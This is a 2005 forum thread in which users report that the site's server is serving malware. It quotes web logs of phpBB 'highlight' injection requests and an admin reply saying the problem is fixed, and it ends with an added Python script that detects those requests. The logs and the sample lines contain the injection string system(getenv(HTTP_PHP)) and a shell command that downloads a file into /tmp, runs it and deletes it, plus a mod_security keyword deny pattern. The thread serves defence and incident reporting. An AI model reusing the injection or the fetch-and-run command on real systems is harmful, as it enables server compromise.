Topic "THIS SITE IS HACKED!!"

Author Message
DogForum

Guest


Does anyone of the admin folks here know that this server has been hacked and it's currently delivering the malware for further attacks on thousands of other systems?

Here is an HTTP header I've got a number of days today:

Quote:
========================================
Request: 216.240.142.215 - - [[22/Jul/2005:00:13:53 +0200]] "GET /phpBB2/viewtopic.php?t=924&sid=42ede7bdcaa7224296188f826cc9feeb&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 500 628
Handler: (null)
----------------------------------------
GET /phpBB2/viewtopic.php?t=924&sid=42ede7bdcaa7224296188f826cc9feeb&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Host: [snip for security reasons]
Accept: */*
User-Agent: Mozilla/4.0
PHP: cd /tmp;wget http: / / winscp.net/forum/db/session;chmod +x session;./session;rm -f session


Please shut this server down as quickly as possible and provide for *ALL* the necessary cleanup and software updates necessary to avoid this situation!!

For further info contact me at:
fsaom at spmtst.homeip.net

Kind regards

Manf
Guest




Got attacked by this site also:

Quote:
HTTP/1.1 403 Forbidden
Content-Length: 309
Keep-Alive: timeout=15, max=293
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
========================================
UNIQUE_ID: tvY7Tdh-VEwAAC9oCjQAAAAE
Request: 217.22.54.52 - - [21/Jul/2005:21:20:51 --0500] "GET /forum/viewtopic.php?t=664&sid=641530179edae83d356f3c380476d872&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 403 293
Handler: (null)
----------------------------------------
GET /forum/viewtopic.php?t=664&sid=641530179edae83d356f3c380476d872&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Host: www.MYSITE.com
Accept: */*
User-Agent: Mozilla/4.0
PHP: cd /tmp;wget http://winscp.net/forum/db/session;chmod +x session;./session;rm -f session
mod_security-message: Access denied with code 403. Pattern match "(system|exec|passthru|cmd|fopen|exit|fwrite|wget)" at THE_REQUEST
mod_security-action: 403
prikryl
Site Admin
Joined: 10 Dec 2002
Posts: 11792
Location: Prague, Czech republic
Issue is hopefully solved. I apologise for any trouble it caused you and my negligence.
_________________
Martin Prikryl
prikryl
Site Admin
Joined: 10 Dec 2002
Posts: 11792
Location: Prague, Czech republic
Also please note that the attacks seem to continue from other affected servers. The attacks attempt to use our server to download the files. However, the files are no longer present on our server.

Note that both IP addresses listed above are not of our server!
_________________
Martin Prikryl
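
Added example, not part of any post in this thread: a log check for the request shape quoted above, applying the keyword pattern from the mod_security message to the decoded `highlight` parameter and separately marking values that use a keyword as a function call. The names `scan`, `CALL` and `SAMPLE_LOG` are hypothetical, and the sample lines are constructed with documentation IP addresses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Keyword pattern quoted in the mod_security message in the thread.
RULE = re.compile(r"(system|exec|passthru|cmd|fopen|exit|fwrite|wget)")
# Stricter check (assumption of this example): a keyword used as a call.
CALL = re.compile(r"\b(system|exec|passthru|fopen|fwrite)\s*\(", re.I)
# Access-log line: ip - - [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[+[^\]]+\]+ "\S+ (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample lines (documentation IP addresses, invented sizes).
SAMPLE_LOG = """\
192.0.2.10 - - [22/Jul/2005:00:13:53 +0200] "GET /phpBB2/viewtopic.php?t=924&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 500 628
192.0.2.11 - - [22/Jul/2005:00:14:02 +0200] "GET /phpBB2/viewtopic.php?t=924&highlight=%27.system%28getenv%28HTTP_PHP%29%29.%27 HTTP/1.0" 200 5120
192.0.2.12 - - [22/Jul/2005:00:15:40 +0200] "GET /phpBB2/viewtopic.php?t=12&highlight=file+system HTTP/1.1" 200 7311
192.0.2.13 - - [22/Jul/2005:00:16:05 +0200] "GET /phpBB2/index.php HTTP/1.1" 200 9000
"""

def scan(log_text):
    """Return one finding per request whose highlight value matches RULE."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        # parse_qs percent-decodes, so encoded and raw forms compare equal.
        for value in parse_qs(urlsplit(target).query).get("highlight", []):
            if RULE.search(value):
                findings.append({
                    "ip": ip,
                    "status": int(status),
                    "highlight": value,
                    "call_syntax": bool(CALL.search(value)),
                })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        level = "ALERT" if f["call_syntax"] else "review"
        print(f'{level:6} {f["ip"]} {f["status"]} highlight={f["highlight"]!r}')
```

The third sample line shows the keyword pattern alone also matching an ordinary search for "file system", which is why the call-syntax flag is reported separately.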